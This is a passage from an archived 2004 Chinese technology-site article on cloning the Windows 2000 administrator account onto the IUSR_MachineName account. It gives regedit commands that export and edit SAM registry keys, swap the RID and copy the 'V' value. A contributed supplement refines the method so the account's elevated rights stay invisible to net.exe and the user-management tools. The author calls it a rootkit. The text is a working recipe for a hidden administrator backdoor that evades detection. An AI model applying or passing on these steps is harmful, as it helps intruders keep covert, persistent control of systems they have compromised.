2019中国新互联网企业·创新互联网企业TOP100
全世界各行各业联合起来,internet一定要实现!
老文章正文

克隆windows 2000管理员帐号

2004-02-19 eNet&Ciweek

  我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

  ^_^,这算不算RootKit...

  附:

  1、感谢叮叮付出需要reinstall OS的代价...

  2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...

  -----------------------------------------------------------------------------

  叮叮 的补充完善

  很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。

  现给出解决办法。

  方法同上,不过这次修改内容多一些。即

  这次要导出两个key内容:

  一个是adam提到的

  regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

  然后另外一个是你需要修改那个账号的值

  regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9

  然后按照adam提到的修改adam.reg

  “将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID”

  现在,你还要从iusr.reg文件中复制一下内容

  就是将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来

  然后替换掉adam.reg中同样位置的部分

  最后使用

  regedit /s adam.reg

  导入该Reg文件

  呵呵,别忘了给这个IUSR_MachineName改密码哦。

  hehe,ok,大功告成。

  现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和

  管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。

  都和修改前没有任何区别。

  好了,补充结束。


相关频道: eNews 老文章

您对本文或本站有任何意见,请在下方提交,谢谢!

投稿信箱:tougao@enet16.com
广告